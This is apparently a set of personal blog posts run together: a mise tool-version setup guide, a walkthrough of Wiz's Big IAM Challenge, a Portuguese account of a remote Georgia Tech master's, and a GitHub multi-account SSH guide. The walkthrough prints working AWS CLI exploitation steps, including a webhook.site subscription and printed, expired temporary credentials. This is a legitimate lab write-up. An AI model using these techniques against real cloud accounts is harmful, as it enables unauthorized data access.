This is a living document. I'll be updating as soon as I improve my setup.

I used to use asdf on my Mac OS X to manage different software versions across my projects, but I was constantly having problems due to various issues.

My manager, Yousif, has recommended a tool that he has been using on a lot of projects at Gruntwork, including Terragrunt: https://github.com/gruntwork-io/terragrunt/blob/main/mise.toml

I've been using it for a few days, and my experience is way better than using asdf so far. I'm writing this guide to help others, but also to remind myself of my own setup.

Installation

Mise is available in different package managers, but I chose to set up with their own required shell script:

curl https://mise.run | sh

I've previously installed mise with homebrew, but I decided to change the setup because installing with Homebrew doesn't allow me to use mise self-update to update mise's version.

Integration with Zsh

After mise is installed, it's suggested to add it to your shell configuration profile.

There's one line added to my ~/.zshrc file to activate mise:

eval "$(/Users/diogenesaherminio/.local/bin/mise activate zsh)"

Integration with VSCode

I'm using this excellent VSCode extension for the whole integration with my Go environment: https://hverlin.github.io/mise-vscode/guides/golang/

What does that mean? You create one mise.toml at the root of the project, similar to this one:

[tools]
go = "1.25.0"
golangci-lint = "2.4.0"
"go:github.com/goph/licensei/cmd/licensei" = "v0.9.0"
"go:go.uber.org/mock/mockgen" = "v0.6.0"
"go:golang.org/x/tools/gopls" = "v0.20.0"

And then all the Go binaries, such as goimports, are set up for both my terminal and VSCode.

What if there's no mise.toml in the folder you're in?

mise offers a possibility to have global defaults for the tool you're trying to use. To use them, you need to run (using go as an example):

mise use -g go@1.25

This will make the go binary available to your terminal globally, but the specific version required by your project will be used if you're in any folder of that project.

This configuration is saved at ~/.config/mise/config.toml :

cat ~/.config/mise/config.toml
[tools]
go = "1.25"

This CTF challenge was created by Wiz.io to help engineers better understand how IAM Policies work.

Challenge #1

The first challenge presents you with the following IAM Policy:

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Principal": "*",
            "Action": "s3:GetObject",
            "Resource": "arn:aws:s3:::thebigiamchallenge-storage-9979f4b/*"
        },
        {
            "Effect": "Allow",
            "Principal": "*",
            "Action": "s3:ListBucket",
            "Resource": "arn:aws:s3:::thebigiamchallenge-storage-9979f4b",
            "Condition": {
                "StringLike": {
                    "s3:prefix": "files/*"
                }
            }
        }
    ]
}

The main problem with the policy above lies in the permissions granted for ListBucket. StringLike allows access if the specified conditions are met. The condition above is s3:prefix: files/* means that any query with this prefix will be allowed:

$ aws s3 ls s3://thebigiamchallenge-storage-9979f4b/files/
2023-06-05 16:13:53         37 flag1.txt
2023-06-08 16:18:24      81889 logo.png

$ aws s3 cp s3://thebigiamchallenge-storage-9979f4b/files/flag1.txt .
download: s3://thebigiamchallenge-storage-9979f4b/files/flag1.txt to ./flag1.txt

$ cat flag1.txt
{wiz:exposed-***}

This way you can access files that shouldn't be supposed to be visible.

Challenge #2

The IAM policy for this challenge is:

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Principal": "*",
            "Action": [
                "sqs:SendMessage",
                "sqs:ReceiveMessage"
            ],
            "Resource": "arn:aws:sqs:us-east-1:092297851374:wiz-tbic-analytics-sqs-queue-ca7a1b2"
        }
    ]
}

The solution is pretty simple. Using AWS CLI:

aws sqs receive-message --queue-url \
  https://sqs.us-east-1.amazonaws.com/092297851374/wiz-tbic-analytics-sqs-queue-ca7a1b2

We can read the body of a message that points to a file in a S3 Bucket.

curl https://tbic-wiz-analytics-bucket-b44867f.s3.amazonaws.com/pAXCWLa6ql.html
{wiz:you-***}

Challenge #3

{
    "Version": "2008-10-17",
    "Id": "Statement1",
    "Statement": [
        {
            "Sid": "Statement1",
            "Effect": "Allow",
            "Principal": {
                "AWS": "*"
            },
            "Action": "SNS:Subscribe",
            "Resource": "arn:aws:sns:us-east-1:092297851374:TBICWizPushNotifications",
            "Condition": {
                "StringLike": {
                    "sns:Endpoint": "*@tbic.wiz.io"
                }
            }
        }
    ]
}

Always be cautious when you see an asterisk. My solution exploited this vulnerability by using:

aws sns subscribe \
    --topic-arn arn:aws:sns:us-east-1:092297851374:TBICWizPushNotifications \
    --protocol https \
    --notification-endpoint https://webhook.site/4c27ac43-4a2-472c-9ae4-430db98850e0/?a=@tbic.wiz.io

Webhook is very useful for testing XSS payloads. I use it a lot when I'm playing CTFs, so it was the first thing that came to mind for this challenge. You can always create a local server and expose to the internet using ngrok too.

After you receive a subscription url and click on it, you are going to receive the flag in another request:

{wiz:always-****}

Challenge #4

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Principal": "*",
            "Action": "s3:GetObject",
            "Resource": "arn:aws:s3:::thebigiamchallenge-admin-storage-abf1321/*"
        },
        {
            "Effect": "Allow",
            "Principal": "*",
            "Action": "s3:ListBucket",
            "Resource": "arn:aws:s3:::thebigiamchallenge-admin-storage-abf1321",
            "Condition": {
                "StringLike": {
                    "s3:prefix": "files/*"
                },
                "ForAllValues:StringLike": {
                    "aws:PrincipalArn": "arn:aws:iam::133713371337:user/admin"
                }
            }
        }
    ]
}

The solution bypasses the ForAllValues:StringLike condition by using:

$ aws s3 ls s3://thebigiamchallenge-admin-storage-abf1321/files/ --no-sign-request
2023-06-07 16:15:43         42 flag-as-admin.txt
2023-06-08 16:20:01      81889 logo-admin.png

$ aws s3 cp s3://thebigiamchallenge-admin-storage-abf1321/files/flag-as-ad
min.txt .
download: s3://thebigiamchallenge-admin-storage-abf1321/files/flag-as-admin.txt to ./flag-as-admin.txt

The solution is inside the text file:

{wiz:principal-arn-***}

Challenge #5

The next challenge provides you with the following IAM policy:

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Sid": "VisualEditor0",
            "Effect": "Allow",
            "Action": [
                "mobileanalytics:PutEvents",
                "cognito-sync:*"
            ],
            "Resource": "*"
        },
        {
            "Sid": "VisualEditor1",
            "Effect": "Allow",
            "Action": [
                "s3:GetObject",
                "s3:ListBucket"
            ],
            "Resource": [
                "arn:aws:s3:::wiz-privatefiles",
                "arn:aws:s3:::wiz-privatefiles/*"
            ]
        }
    ]
}

By getting the credentials from the browser console by using: (probably that's not the intended solve :D)

AWS.config.credentials

This allows you to see the temporary credentials needed to access Cognito. After pasting the credentials into the shell, you can see the flag:

➜  ~ aws s3 ls s3://wiz-privatefiles/
2023-06-05 16:42:27       4220 cognito1.png
2023-06-05 10:28:35         37 flag1.txt

➜  ~ cat flag1.txt
{wiz:incognito-***}

Challenge #6

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Principal": {
                "Federated": "cognito-identity.amazonaws.com"
            },
            "Action": "sts:AssumeRoleWithWebIdentity",
            "Condition": {
                "StringEquals": {
                    "cognito-identity.amazonaws.com:aud": "us-east-1:b73cb2d2-0d00-4e77-8e80-f99d9c13da3b"
                }
            }
        }
    ]
}

The first step is to get the Id of the pool using the following command:

$ aws cognito-identity get-id --identity-pool-id us-east-1:b73cb2d2-0d00-4e77-8e80-f99d9c13da3b
{
    "IdentityId": "us-east-1:157d6171-ee58-ccb6-9df3-dc9103b53884"
}

Then, you authenticate with:

➜  ~ aws cognito-identity get-open-id-token --identity-id us-east-1:40937fe8-22d8-41da-959a-bb32296491af | cat
{
    "IdentityId": "us-east-1:40937fe8-22d8-41da-959a-bb32296491af",
    "Token": "eyJraWQiOiJ1cy1lYXN0LTEtNiIsInR5cCI6IkpXUyIsImFsZyI6IlJTNTEyIn0.eyJzdWIiOiJ1cy1lYXN0LTE6NDA5MzdmZTgtMjJkOC00MWRhLTk1OWEtYmIzMjI5NjQ5MWFmIiwiYXVkIjoidXMtZWFzdC0xOmI3M2NiMmQyLTBkMDAtNGU3Ny04ZTgwLWY5OWQ5YzEzZGEzYiIsImFtciI6WyJ1bmF1dGhlbnRpY2F0ZWQiXSwiaXNzIjoiaHR0cHM6Ly9jb2duaXRvLWlkZW50aXR5LmFtYXpvbmF3cy5jb20iLCJleHAiOjE3MjEyNDY1MTksImlhdCI6MTcyMTI0NTkxOX0.ZNcxiRY6JAk2O7aTH34x16Eg_dG6yNZvUR4NWrThmohGXgulJcIgHca2nMby7aaLEENw_RNgNb3ckKZ74DpUnYf9eTwmcm1oHaqU6-OfztV7Mx23nr0VAfQI5X1dLmgh4AMW6u3draLxc1hGnhNobYIxYMbRLTpFsuTxDKV_G_2keuDqi5QQgS1ENuPXJX0fBq7VRHqdfsoAcJqR5oMYJWSsc5dDC2lsKsSDsz0qAtUscrnqzrTuLMV7qZVMHf_YIsO3AXMnYMfywJO3NpmDlNN6MBNPnKNEUOVEvPMRKeAVxpJVOHZYBmaUSaOmz4cEdoE7uCAFNZTGqPuCdkWKwg"
}

Then:

➜  ~ aws sts assume-role-with-web-identity --role-arn arn:aws:iam::092297851374:role/Cognito_s3accessAuth_Role --role-session-name diofeher --web-identity-token eyJraWQiOiJ1cy1lYXN0LTEtNiIsInR5cCI6IkpXUyIsImFsZyI6IlJTNTEyIn0.eyJzdWIiOiJ1cy1lYXN0LTE6NDA5MzdmZTgtMjJkOC00MWRhLTk1OWEtYmIzMjI5NjQ5MWFmIiwiYXVkIjoidXMtZWFzdC0xOmI3M2NiMmQyLTBkMDAtNGU3Ny04ZTgwLWY5OWQ5YzEzZGEzYiIsImFtciI6WyJ1bmF1dGhlbnRpY2F0ZWQiXSwiaXNzIjoiaHR0cHM6Ly9jb2duaXRvLWlkZW50aXR5LmFtYXpvbmF3cy5jb20iLCJleHAiOjE3MjEyNDY1MTksImlhdCI6MTcyMTI0NTkxOX0.ZNcxiRY6JAk2O7aTH34x16Eg_dG6yNZvUR4NWrThmohGXgulJcIgHca2nMby7aaLEENw_RNgNb3ckKZ74DpUnYf9eTwmcm1oHaqU6-OfztV7Mx23nr0VAfQI5X1dLmgh4AMW6u3draLxc1hGnhNobYIxYMbRLTpFsuTxDKV_G_2keuDqi5QQgS1ENuPXJX0fBq7VRHqdfsoAcJqR5oMYJWSsc5dDC2lsKsSDsz0qAtUscrnqzrTuLMV7qZVMHf_YIsO3AXMnYMfywJO3NpmDlNN6MBNPnKNEUOVEvPMRKeAVxpJVOHZYBmaUSaOmz4cEdoE7uCAFNZTGqPuCdkWKwg | cat
{
    "Credentials": {
        "AccessKeyId": "ASIARK7LBOHXCEB2J3EI",
        "SecretAccessKey": "rCEOwjWOlMwfDPMg7N5biK5tIGo34Q0IhuD5L5CS",
        "SessionToken": "IQoJb3JpZ2luX2VjECwaCXVzLWVhc3QtMSJIMEYCIQDLmZHdbY1Na1egTIh/SB9nn+dCfvbV7E4RMrgrqIXztQIhAKVrUattduDWKZobSKIkpaj6muwLac7wOBaIUWSU3Ij7KpIDCPX//////////wEQABoMMDkyMjk3ODUxMzc0IgyWlfAqqr41LKYHBm4q5gIl7cw7vDta6c+GxKGkMTdW/yccmC5LYDaoDlSImGqRg1yEI2YDtPkSWhuwziIODGLL7vHMPzvTwdoULy7DGck7a2ECjG4Ucoj8YND3zK9hpo8FKUVEN0QYW/oWx8l12Ia7wh6iYYB2NqP9cDKx+S7xUNh6V/VYIeyY64Q4g9CGZTUZbAGVpGMidmzft7Sx3cKFDSoudf7xO+dl38pL/tK6IRQpCFKoQvLumrxs/3oZAfBjyoMEfllgUTyS5SonfYAYJprJKO9ktwW1tJXmCSgVu9KYU3oiK5d/oyPm2D7nbIwBTp/eJLX8LZEFTLBVTbE2t7mgW7pSXGXncKvzFuBz68GWErVZwX7gzJ2mn+GtAtC4XedM1Pbl5+P/me86QWoTCCfj3UWCKRCq9Z2LtzAurpOWCSDsYb2zW1gurduwyH4Ir2QwUQH+2vZYy/tAJJUOOs1SW6tD9WoCluIOgs0QhSGodWnEMLHC4LQGOoYCgX4/8GKx6gWqiui+T+JxAL9mVWydyIG722FPAAhsqTprxRqDRzPANE3Rek7vQnrzIYXqxvSxX4EHopnI+9qowa17Q+DD5kbEbpt+CNKVILyeyjtrlgC1pIGrDJCeARYgM4SORdU0KCwz86Pvd8KGRgzogd4C8342jgYAALkSIWJHvCmesVqz0GyDWV01N99dpfTpYVcmdgo4w18UCfRFrjKDsdiB0lK+JhPfgpy7I9EHhKZAZPrR9SsBlChnI1aoSbqK+BEHEfLW/r0xYm0iLyhXQVxiFLaOzKvgZELtAFDIyfN7xJiSm+L8qMZVLIfR9prwzp4rGTRWzG3uKfZPAORmYX+Ehg==",
        "Expiration": "2024-07-17T20:53:21+00:00"
    },
    "SubjectFromWebIdentityToken": "us-east-1:40937fe8-22d8-41da-959a-bb32296491af",
    "AssumedRoleUser": {
        "AssumedRoleId": "AROARK7LBOHXASFTNOIZG:diofeher",
        "Arn": "arn:aws:sts::092297851374:assumed-role/Cognito_s3accessAuth_Role/diofeher"
    },
    "Provider": "cognito-identity.amazonaws.com",
    "Audience": "us-east-1:b73cb2d2-0d00-4e77-8e80-f99d9c13da3b"
}

After exporting these credentials to the shell, we can access:

➜  ~ aws s3 ls
2024-06-06 03:21:35 challenge-website-storage-1fa5073
2024-06-06 05:25:59 payments-system-cd6e4ba
2023-06-04 14:07:29 tbic-wiz-analytics-bucket-b44867f
2023-06-05 10:07:44 thebigiamchallenge-admin-storage-abf1321
2023-06-04 13:31:02 thebigiamchallenge-storage-9979f4b
2023-06-05 10:28:31 wiz-privatefiles
2023-06-05 10:28:31 wiz-privatefiles-x1000

➜  ~ aws s3 ls s3://wiz-privatefiles-x1000
2023-06-05 16:42:27       4220 cognito2.png
2023-06-05 10:28:35         40 flag2.txt

➜  ~ aws s3 cp  s3://wiz-privatefiles-x1000/flag2.txt .
cat fCompleted 40 Bytes/40 Bytes (83 Bytes/s) with 1 file(s) rdownload: s3://wiz-privatefiles-x1000/flag2.txt to ./flag2.txt
la%
➜  ~ cat flag2.txt
{wiz:open-***}

If you're up for the challenges, please try to solve them on your own first. That way, if you get stuck, you can use this post to help unblock yourself.

Have fun!

Frequentemente recebo mensagens de pessoas no Linkedin interessadas em aplicar pra um mestrado remoto no Estados Unidos. Em dezembro de 2024, concluí o que fiz na Georgia Tech, nos Estados Unidos, totalmente remoto. Vou elencar todo o processo de seleção, disciplinas e minha experiência como estudante trabalhando full-time ao mesmo tempo.

Processo de seleção

https://omscs.gatech.edu/admission-criteria

• Bacharelado (ou equivalente) com nota superior a 3. Traduzindo pro sistema brasileiro, 7.5 é a nota necessária.

• 3 referências de colegas e ex-professores.

• Nota mínima em testes de inglês https://grad.gatech.edu/degree-programs/computer-science-online

  • 7.5 para IELTS (nota minima 6.5 para Listening, Speaking e Reading, 5.5 para Writing);

  • 100 para TOEFL, com nota mínima de 19 para cada sessão;

No meu caso, minha graduação foi um Tecnólogo em Sistemas para internet. Também havia terminado uma pós-gradução em Cibersegurança e Ethical Hacking. Não sei se teriam me admitido sem a pós, mas mandando os dois diplomas foi o suficiente para ser aceito.

Quando fiz a aplicação, minha nota no TOEFL foi 99, porém na minha época a nota de admissão era 90. Recentemente eles mudaram para 100, então como fiz a prova sem me preparar na época, recomendo que se preparem para evitar surpresas.

Especializações

https://omscs.gatech.edu/specializations

Ao ter entrado no programa, você precisa escolher uma especialização para poder saber quais são as discliplinas obrigatórias que você precisa fazer.

São elas:

1. Computing Systems

2. Computer Graphics

3. Computational Perception and Robotics

4. Human-Computer Interaction

5. Interactive Intelligence

6. Machine Learning

Como entrei com o objetivo de aprender mais sobre Ciência da Computação, acabei escolhendo a especialização de Computing Systems.

Disciplinas

Na especialização de Computing Systems, existe somente uma disciplina obrigatória, que pode ser a 6505 ou a 6515 (as duas são relacionadas a algoritmos), e também você deve escolher mais duas entre:

• CS 6210 Advanced Operating Systems

• CS 6241 Compiler Design

• CS 6250 Computer Networks

• CS 6290 High-Performance Computer Architecture

• CS 6300 Software Development Process or CS 6301 Advanced Topics in Software Engineering

• CS 6390 Programming Languages

• CS 6400 Database Systems Concepts and Design

Dessas, peguei a 6210 (Sistemas operacionais avançados), 6250 (rede de computadores).

Você também precisa escolher 3 eletivas, no mínimo, entre elas:

• CS 6035 Introduction to Information Security

• CS 6200 Graduate Introduction to Operating Systems​

• CS 6262 Network Security

• CS 6340 Software Analysis and Testing

A lista completa pode ser acessada aqui. Dessas que peguei, gostei de todas, porém algumas não eram tão difíceis, como a de introdução a segurança da informação. Optei em escolhê-la para descansar um pouco, pois trabalhar e estudar é bem puxado. Para completar as 3 que faltavam, optei por essas outras 3 disciplinas:

• AI Ethics Society

• ST: GPU hardware and software

• Intro Analytics Modeling

A única dessas 3 que recomendo é a da GPU, aprendi bastante sobre programação paralela e pude implementar vários projetos diferentes em CUDA e em projetos baixo-nível em simulações escritas em Python.

Formato das Aulas

O formato das aulas varia bastante de disciplina pra disciplina. Normalmente as aulas são gravadas, e toda semana tem um office hours em que você pode tirar suas dúvidas. Na de algoritmos, por exemplo, toda quarta tem office hours e eles ficam gravados, porém você não pode baixar e eles duram até o final do período.

Algumas disciplinas não tem office hours, mas os instrutores postam nas ferramentas de discussão (como o Piazza) toda semana detalhando mais sobre os assuntos que devem ser estudados. Você também sempre pode perguntar e os instrutores e outros alunos respondem.

Algumas disciplinas tem provas, outras tem somente projetos. Algumas tem um mix dos dois. Mais uma vez usando o exemplo de algoritmos, a disciplina tinha 3 provas e homework para ser entregue toda semana. Outra matéria como a de Testing, liberava todos os projetos no começo e você poderia ir fazendo no seu ritmo, cada projeto tendo uma deadline diferente.

Antes de escolher as disciplinas que você vai pegar, recomendo ir ao Slack dos estudantes e tirar esse tipo de dúvida. Tem dois sites que podem te ajudar:

https://www.omscentral.com/ - Esse está mais desatualizado, porém você consegue ver feedback sobre disciplinas mais antigas;

https://docs.google.com/spreadsheets/d/e/2PACX-1vRyHrRhH2V52bsYFEtm-8oJDaFOlyGYz6AKXm8WwsthN3fNP3KGkEx7O7D9ZHV3j2iKnzU2XHqoh4pQ/pubhtml - Essa spreadsheet não tem reviews, mas te ajuda a ver quantas vagas uma disciplinas pode ter em cada período e os canais do Slack de cada disciplina.

Disciplinas Mínimas

Não consegui achar o link onde explica isso, mas lá são 3 períodos por ano, diferente do Brasil:

• Spring - Começo do ano

• Summer - Junho - Agosto

• Fall - Final do ano

Eles permitem que você passe um período sem estudar, e você não precisa avisá-los. Porém se forem dois períodos consecutivos, você precisa entrar em contato para explicar o motivo. Muita gente decide não pegar matérias no verão por serem somente 3 meses, e os cursos serem mais corridos, e outras pessoas decidem por pegar disciplinas mais fáceis no verão.

Tempo máximo

https://omscs.gatech.edu/omscs-faqs

Eles permitem que você conclua em até 6 anos. Conheci muita gente que terminou em 2, 2 anos e meio. Eu preferi fazer mais lento para poder conciliar com minha vida profissional e pessoal, então termine em 3 anos e meio (passei alguns períodos sem fazer nenhuma e fiz 2 em outros).

Custo

O custo varia em cada período dependendo de quantas disciplinas você paga. Em dezembro de 2024, paguei o seguinte por disciplina:

Essa taxa de 24 dólares é referente ao cartão de crédito.

Benefícios

https://sites.gatech.edu/omsfreeanddiscounted/

Só de ser estudante da Georgia Tech, você tem acesso a vários softwares de graça, como Github Student Pack, biblioteca da O'Reilly (usei bastante), Headspace, YNAB, entre outros.

Você tem acesso ao Slack onde todos os estudantes estão, e tem vários canais com cada disciplina.

TCC?

O mestrado da Georgia Tech não pede que você faça nenhum projeto, tese ou artigo ao final do curso. O mais próximo que tem disso, pelo que soube, é numa disciplina de iniciação a pesquisa científica. No meu caso, não fiz essa disciplina pois não tinha tanto interesse em pesquisa acadêmica. Pude concluir apenas fazendo as 10 disciplinas.

Vale a pena?

Valeu muito a pena! Pude estudar assuntos que não teria motivação pra estudar sozinho, como GPU e Algoritmos. Também pude fazer muito networking, conheci bastante gente que trabalhava em Big Tech, gente do outro lado do mundo, fiz bons amigos e companheiros de estudos que fizeram várias disciplinas junto comigo.

Porém tudo isso tem um custo, espere ficar estressado, perder reuniões de amigos e familiares para completar projetos, atrasar algo no trabalho pq está chegando em alguma deadline de entrega de projeto…

Além das coisas que citei anteriormente, creio que meu maior ganho foi ter perdido o medo de aprofundar em qualquer assunto, de ler papers que não tem nada implementado e tentar implementar, etc.

Conclusão

Agradeço muito à minha esposa, minha família e aos amigos mais próximos pelo apoio e por entenderem quando eu não podia estar presente. Um abraço especial pra Rafael, grande companheiro de muitas disciplinas, e Pablo, Jessie, Ali e Kashyap pela super parceria de estudos, sem vocês eu não conseguiria ter terminado a disciplina de algoritmos :)

Agradeço também a Diego Pessoa, Luiz Carlos e Thiago Moura pelas referências como professores do IFPB, sem vocês eu não conseguiria ter entrado no mestrado.

É isso, se tiverem alguma dúvida podem me contatar pelo Linkedin ou deixar um comentário aqui que respondo assim que puder. :)

Have you ever needed two different GitHub accounts — one for personal use and one for work? GitHub doesn’t allow the same SSH key to be used for multiple accounts; if you try to reuse it, you’ll see a “Key Already in Use” error.

So, what’s the best way to set this up on your computer?

First, you’ll need to create two separate SSH keys and add them to your GitHub accounts. I usually use this to generate them:

cd ~/.ssh
ssh-keygen -t ed25519 -C "your-email@company.com" -f company
ssh-keygen -t ed25519 -C "your-email@personal.com" -f personal

Now you have 4 different files at ~/.ssh. company and personal are your private keys. company.pub and personal.pub are the public keys you're going to add to Github.

Time to adjust your git config to use the proper keys in each repo. I usually have a folder workspace with all my projects, like the following structure:

.workspace
├── personal
└── company

Define your .ssh/config in the following way:

Host github-company
  HostName github.com
  AddKeysToAgent yes
  IdentityFile ~/.ssh/company

Host github.com
  HostName github.com
  AddKeysToAgent yes
  IdentityFile ~/.ssh/personal

The last step is to configure your .gitconfig:

[user]
    # Personal configuration as default
    name = Your Name
    email = your-email@personal.com

[includeIf "gitdir:~/workspace/company"]
        path = ~/.dotfiles/src/gitconfig/work

And on ~/.dotfiles/src/gitconfig/work:

[user]
    name = Your Name
    email = your-name@company.com

Now, if you want to clone a project at ~/workspace/company, you need to use the following command:

git clone git@github-company:org/repo.git

Notice the host name will be different, that's what makes the connection between git and the work's SSH key. If you try to push or pull, the SSH key will be automatically be used. Check that with git remote -v:

origin    git@github-company:org/repo.git (fetch)
origin    git@github-company:org/repo.git (push)

That's it! Feel free to comment if you have a better approach :)